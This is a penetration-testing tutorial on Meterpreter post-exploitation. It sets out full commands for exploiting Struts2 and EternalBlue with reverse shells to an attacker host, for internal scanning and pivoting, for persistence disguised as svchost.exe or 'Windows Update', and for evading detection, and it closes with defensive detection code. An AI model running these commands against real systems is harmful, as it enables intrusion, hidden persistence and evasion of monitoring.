Scanning and Port Forwarding Through a Meterpreter Session
Master advanced post-exploitation techniques using Meterpreter for network reconnaissance, pivoting, and establishing persistent access through compromised systems.
Introduction to Meterpreter Post-Exploitation
Meterpreter is one of the most powerful post-exploitation payloads available in the Metasploit Framework. Once you've gained initial access to a target system, Meterpreter provides an extensive set of capabilities for network reconnaissance, lateral movement, and maintaining persistent access.
Legal Warning: This tutorial is for authorized penetration testing and educational purposes only. Only use these techniques on systems you own or have explicit written permission to test. Unauthorized access to computer systems is illegal.
This tutorial covers advanced techniques for using Meterpreter sessions to scan internal networks, establish port forwarding tunnels, and pivot through compromised systems to reach previously inaccessible network segments.
Meterpreter Session Fundamentals
Establishing a Meterpreter Session
Before diving into advanced techniques, let's review how to establish a Meterpreter session:
```
# Start Metasploit console
msfconsole

# Example: Using a web application exploit
use exploit/multi/http/struts2_content_type_ognl
set RHOSTS target.example.com
set LHOST attacker_ip
set payload windows/meterpreter/reverse_tcp
run

# Example: Using a Windows SMB exploit
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set LHOST attacker_ip
set payload windows/x64/meterpreter/reverse_tcp
exploit
```
Session Management
Once you have active sessions, proper management is crucial:
```
# List active sessions
sessions -l

# Interact with a specific session
sessions -i 1

# Background current session
background

# Kill a session
sessions -k 1

# Kill all sessions
sessions -K

# Upgrade shell to Meterpreter (if needed)
sessions -u 1
```
Network Reconnaissance Techniques
Internal Network Discovery
The first step in post-exploitation is understanding the network topology:
```
# Get network configuration
meterpreter > ipconfig

# Display network interfaces (ifconfig is an alias of ipconfig)
meterpreter > ifconfig

# Show network connections (Meterpreter's netstat takes no options)
meterpreter > netstat

# Get system information
meterpreter > sysinfo

# Show running processes
meterpreter > ps

# Display current user context
meterpreter > getuid
```
ARP Table Analysis
The ARP table reveals recently communicated hosts on the local network:
```
# View ARP table from Meterpreter
meterpreter > arp

# Execute system command to view ARP table
meterpreter > execute -f cmd.exe -a "/c arp -a" -H

# On Linux systems
meterpreter > execute -f /bin/bash -a "-c 'arp -a'" -H

# Use auxiliary module for network discovery
background
use auxiliary/scanner/discovery/arp_sweep
set RHOSTS 192.168.1.0/24
set SESSION 1
run
```
Route Discovery and Analysis
```
# Display routing table
meterpreter > route

# Windows route command
meterpreter > execute -f cmd.exe -a "/c route print" -H

# Linux route command
meterpreter > execute -f /bin/bash -a "-c 'route -n'" -H

# Display network statistics
meterpreter > execute -f cmd.exe -a "/c netstat -rn" -H
```
Port Scanning Through Meterpreter
Internal Network Scanning
Use Meterpreter to scan internal networks that are not directly accessible from your attack machine:
```
# Background the current session
background

# TCP port scanner through session
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
set PORTS 21,22,23,25,53,80,110,443,993,995,1723,3389,5900
set SESSION 1
run

# SYN scanner (faster but requires raw sockets)
use auxiliary/scanner/portscan/syn
set RHOSTS 192.168.1.0/24
set PORTS 1-1000
set SESSION 1
run

# Full TCP port range on a single host
# (the tcp scanner reports open ports only; it does not fingerprint service versions)
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.100
set PORTS 1-65535
set SESSION 1
set THREADS 50
run
```
Stealth Scanning Techniques
Implement stealth techniques to avoid detection during scanning:
```
# Use built-in Windows tools for stealth scanning
meterpreter > execute -f cmd.exe -a "/c for /L %i in (1,1,254) do @ping -n 1 -w 200 192.168.1.%i > nul && echo 192.168.1.%i is alive" -H

# Port scanning with netcat through Meterpreter
meterpreter > upload nc.exe C:\temp\nc.exe
meterpreter > execute -f C:\temp\nc.exe -a "-zv 192.168.1.100 80-443" -H

# PowerShell port scanner
# (-Command takes the rest of the line, so no nested double quotes are needed)
meterpreter > execute -f powershell.exe -a "-Command 1..254 | ForEach-Object { Test-NetConnection 192.168.1.$_ -Port 80 -InformationLevel Quiet }" -H

# Slow scan to evade IDS
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.100
set PORTS 80,443,22,21
set DELAY 5
set SESSION 1
run
```
Port Forwarding and Pivoting
Local Port Forwarding
Forward traffic from your local machine through the compromised host to internal targets:
```
# Forward local port 8080 to internal web server
meterpreter > portfwd add -l 8080 -p 80 -r 192.168.1.50

# Forward RDP port for internal Windows machine
meterpreter > portfwd add -l 3390 -p 3389 -r 192.168.1.100

# Forward SSH port for internal Linux machine
meterpreter > portfwd add -l 2222 -p 22 -r 192.168.1.200

# List active port forwards
meterpreter > portfwd list

# Delete a specific port forward
meterpreter > portfwd delete -l 8080

# Delete all port forwards
meterpreter > portfwd flush
```
After setting up port forwarding, you can access internal services:
```
# Access forwarded web service
curl http://localhost:8080

# Connect to forwarded RDP
rdesktop localhost:3390

# SSH to forwarded service
ssh user@localhost -p 2222
```
Reverse Port Forwarding
Allow internal systems to connect back to your attack machine:
```
# Reverse forward - make attack machine accessible from internal network
# With -R, -p is the port opened on the compromised host, -l is the port on the
# attack machine and -L is its address (-r only applies to forward port forwards)
meterpreter > portfwd add -R -p 4444 -l 80 -L attacker_ip

# This allows internal machines to connect to port 4444 on the compromised host
# and reach port 80 on the attacker machine

# Example: Setting up a reverse HTTP server
# On attacker machine, start HTTP server
python3 -m http.server 80

# Internal machines can now access: http://compromised_host:4444
```
Dynamic Port Forwarding (SOCKS)
Set up a SOCKS proxy for flexible traffic routing:
```
# Background the session
background

# Start SOCKS proxy
use auxiliary/server/socks_proxy
set SRVPORT 1080
set VERSION 5
run -j

# Configure routing through the session
sessions -i 1
run autoroute -s 192.168.1.0/24

# Now configure your tools to use SOCKS proxy at localhost:1080
# Example with proxychains
echo "socks5 127.0.0.1 1080" >> /etc/proxychains.conf
proxychains nmap -sT 192.168.1.0/24
```
Advanced Tunneling Techniques
Using Autoroute for Pivoting
Autoroute automatically configures routing to access remote networks:
```
# Add route through Meterpreter session
meterpreter > run autoroute -s 192.168.1.0/24

# Add multiple networks
meterpreter > run autoroute -s 10.10.10.0/24
meterpreter > run autoroute -s 172.16.0.0/16

# View current routes
meterpreter > run autoroute -p

# Delete a route
meterpreter > run autoroute -d 192.168.1.0/24

# Background session and use auxiliary modules
background
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.168.1.0/24
set PORTS 80,443,22,21,25
run
```
SOCKS Proxy Configuration
Configure applications to use the SOCKS proxy for accessing internal networks:
```
# Configure browser to use SOCKS proxy
# Firefox: Network Settings -> Manual proxy configuration
# SOCKS Host: 127.0.0.1, Port: 1080, SOCKS v5

# Use with command-line tools
# With curl
curl --socks5 127.0.0.1:1080 http://192.168.1.100

# wget has no native SOCKS support (and no --http-proxy flag); wrap it with proxychains
proxychains wget http://192.168.1.100

# Proxychains configuration
echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf
proxychains firefox
proxychains nmap -sT 192.168.1.0/24
```
Maintaining Persistent Access
Service-Based Persistence
Establish persistence using Windows services:
```
# Create persistent service
meterpreter > run metsvc

# Manual service creation
meterpreter > upload payload.exe C:\windows\temp\svchost.exe
meterpreter > execute -f sc.exe -a "create MyService binPath= C:\windows\temp\svchost.exe start= auto" -H
meterpreter > execute -f sc.exe -a "start MyService" -H

# Background and set up handler for persistent connection
background
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST attacker_ip
set LPORT 4445
run -j
```
Registry Persistence
```
# Add registry persistence
meterpreter > run persistence -U -i 5 -p 4445 -r attacker_ip

# Manual registry modification
meterpreter > reg setval -k HKLM\software\microsoft\windows\currentversion\run -v "Windows Update" -t REG_SZ -d "C:\windows\temp\payload.exe"

# View registry entries
meterpreter > reg queryval -k HKLM\software\microsoft\windows\currentversion\run -v "Windows Update"
```
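The artifacts the two persistence methods above leave behind (a Run-key value and a service whose binary lives in a temp directory) are what an endpoint detection rule keys on. The following is an added example, not part of the original tutorial or of Metasploit: it runs a simple rule over constructed Sysmon-style events (EventID 13 = registry value set, EventID 1 = process create; field names follow Sysmon, all values are made up here) and flags autostart entries that point into user-writable directories.

```python
import re

# Constructed Sysmon-style events for this example (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 13, "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update",
     "Details": r"C:\windows\temp\payload.exe"},
    {"EventID": 13, "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealth",
     "Details": r"C:\Windows\System32\SecurityHealthSystray.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": r"sc.exe create MyService binPath= C:\windows\temp\svchost.exe start= auto"},
    {"EventID": 1, "Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": r"sc.exe query wuauserv"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c route print"},
]

# Run / RunOnce keys under any hive.
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(Once)?\\", re.IGNORECASE)
# Directories a legitimate autostart binary normally does not live in
# (writable by low-privilege users, or the temp dir this tutorial uploads into).
SUSPECT_DIRS = re.compile(
    r"^[A-Z]:\\(?:windows\\temp|temp|programdata|users\\[^\\]+\\appdata)\\", re.IGNORECASE)
# "sc create <name> binPath= <path>"; captures the service binary path.
SC_CREATE = re.compile(r"\bcreate\b.*?binPath=\s*\"?([^\s\"]+)", re.IGNORECASE)

def flag_persistence(events):
    """Return (kind, name, path) for each event that plants an autostart from a suspect dir."""
    findings = []
    for ev in events:
        if ev["EventID"] == 13 and RUN_KEY.search(ev["TargetObject"]):
            path = ev["Details"].strip('"')
            if SUSPECT_DIRS.match(path):
                value_name = ev["TargetObject"].rsplit("\\", 1)[1]
                findings.append(("run_key", value_name, path))
        elif ev["EventID"] == 1 and ev["Image"].lower().endswith("\\sc.exe"):
            m = SC_CREATE.search(ev["CommandLine"])
            if m and SUSPECT_DIRS.match(m.group(1)):
                service_name = ev["CommandLine"].split()[2]
                findings.append(("service", service_name, m.group(1)))
    return findings

if __name__ == "__main__":
    for finding in flag_persistence(SAMPLE_EVENTS):
        print(finding)
```

The benign SecurityHealth entry and the `sc query` call produce no finding; the two entries created in this section do.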
Detection Evasion Techniques
Implement techniques to avoid detection by security monitoring systems:
Traffic Obfuscation
- HTTP/HTTPS tunneling: Use web traffic to hide command and control
- DNS tunneling: Exfiltrate data through DNS queries
- Timing attacks: Vary connection intervals to avoid pattern detection
- Process migration: Move to legitimate processes to avoid suspicion
```
# Migrate to a legitimate process
meterpreter > ps
meterpreter > migrate 1234

# Use encrypted payloads
use payload/windows/meterpreter/reverse_https
set LHOST attacker_ip
set LPORT 443

# Set up domain fronting (advanced)
set HttpHostHeader legitimate-domain.com
set HttpServerName cdn.cloudfront.net
```
Defense and Detection Strategies
Understanding defensive measures helps both in testing their effectiveness and implementing proper security.
Network Monitoring
- Network segmentation: Limit lateral movement between network segments
- Traffic analysis: Monitor for unusual traffic patterns and volumes
- Behavioral analysis: Detect anomalous process and network behavior
- Endpoint detection: Deploy EDR solutions to monitor endpoint activity
- Log correlation: Correlate logs across multiple systems for attack patterns
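The traffic-analysis and log-correlation points above can be made concrete against the scanning sections earlier in this tutorial. The following is an added example, not code from the tutorial or from Metasploit: a sliding-window detector run over a constructed connection log (one TCP connect per line, in a made-up "timestamp src dst port" format such as a firewall or NetFlow export might give). It flags a burst port scan of one host, a horizontal sweep of port 80 across many hosts, and shows why the slow-scan trick (one port every 30 s here) slips past a one-minute window but not a one-hour one.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed connection log for this example (not from a real network).
BASE = datetime(2024, 1, 1, 9, 0, 0)

def _line(t, src, dst, port):
    return f"{t.isoformat()} {src} {dst} {port}"

SAMPLE_LOG = []
for i in range(10):   # benign: a workstation talking SMB to the file server
    SAMPLE_LOG.append(_line(BASE + timedelta(seconds=7 * i), "192.168.1.20", "192.168.1.50", 445))
for i in range(40):   # burst vertical scan: 40 ports on one host within 4 seconds
    SAMPLE_LOG.append(_line(BASE + timedelta(seconds=0.1 * i), "192.168.1.10", "192.168.1.100", 1 + i))
for i in range(40):   # slow vertical scan: one new port every 30 s
    SAMPLE_LOG.append(_line(BASE + timedelta(seconds=30 * i), "192.168.1.10", "192.168.1.200", 1000 + i))
for i in range(60):   # horizontal sweep: port 80 on 60 hosts within 12 seconds
    SAMPLE_LOG.append(_line(BASE + timedelta(minutes=10, seconds=0.2 * i), "192.168.1.10", f"192.168.1.{1 + i}", 80))

def parse(line):
    ts, src, dst, port = line.split()
    return datetime.fromisoformat(ts), src, dst, int(port)

def detect_scans(lines, window, threshold, mode="vertical"):
    """Sliding-window scan detector over timestamp-sorted connects.
    'vertical' groups by (src, dst) and counts distinct ports; 'horizontal' groups by
    (src, port) and counts distinct hosts. Returns {group: peak distinct count} for
    every group that reaches `threshold` inside any `window`-second span."""
    groups = defaultdict(list)
    for ts, src, dst, port in sorted(parse(l) for l in lines):
        if mode == "vertical":
            groups[(src, dst)].append((ts, port))
        else:
            groups[(src, port)].append((ts, dst))
    hits = {}
    for key, events in groups.items():
        lo, peak = 0, 0
        for hi in range(len(events)):
            while events[hi][0] - events[lo][0] > timedelta(seconds=window):
                lo += 1          # drop events that fell out of the window
            peak = max(peak, len({v for _, v in events[lo:hi + 1]}))
        if peak >= threshold:
            hits[key] = peak
    return hits

if __name__ == "__main__":
    print("1-minute window:", detect_scans(SAMPLE_LOG, 60, 20))
    print("1-hour window:  ", detect_scans(SAMPLE_LOG, 3600, 20))
    print("port-80 sweep:  ", detect_scans(SAMPLE_LOG, 60, 20, mode="horizontal"))
```

With a 60 s window only the burst scan and the sweep are reported; widening the window to an hour also surfaces the slow scan, at the cost of more state per source, which is the usual trade-off when tuning such a rule.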
Preventive Measures
- Patch management: Keep systems updated to prevent initial compromise
- Least privilege: Limit user and service account privileges
- Application whitelisting: Prevent unauthorized executable execution
- Network access control: Implement strict firewall rules and ACLs
- Multi-factor authentication: Protect against credential compromise
Legal and Ethical Considerations
Post-exploitation activities carry significant legal and ethical responsibilities.
Critical Legal Requirements
- Only perform these activities on authorized systems with proper documentation
- Post-exploitation activities require explicit scope definition
- Data exfiltration and persistence may have additional legal restrictions
- Maintain detailed logs of all activities for compliance and reporting
- Understand local laws regarding computer intrusion and data access
Penetration Testing Best Practices
- Define clear scope boundaries before beginning post-exploitation
- Document all systems accessed and techniques used
- Minimize impact on production systems and user productivity
- Remove all persistence mechanisms and uploaded files after testing
- Report vulnerabilities promptly with clear remediation guidance
Conclusion
Meterpreter provides an incredibly powerful platform for post-exploitation activities, enabling penetration testers to thoroughly assess network security and demonstrate the potential impact of successful attacks.
The techniques covered in this tutorial - network reconnaissance, port forwarding, and persistent access - represent core capabilities that attackers use in real-world scenarios. Understanding these methods is essential for both offensive security professionals and defenders.
Practice Safely: Set up isolated lab environments to practice these techniques safely and legally. Consider using platforms like HackTheBox, TryHackMe, or building your own virtual lab infrastructure.